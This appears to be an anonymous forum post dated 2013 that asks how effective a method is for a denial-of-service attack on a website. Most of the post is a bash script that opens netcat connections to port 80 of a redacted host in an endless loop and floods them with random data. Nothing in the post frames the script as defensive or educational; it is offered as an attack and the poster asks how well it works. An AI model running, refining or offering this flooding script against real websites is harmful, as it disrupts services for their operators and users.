Name: Anonymous 2013-09-29 4:23
How effective is this method of DOSing a website?
#!/bin/bash
while true; do
nc [redacted] 80 </dev/urandom >/dev/null &
done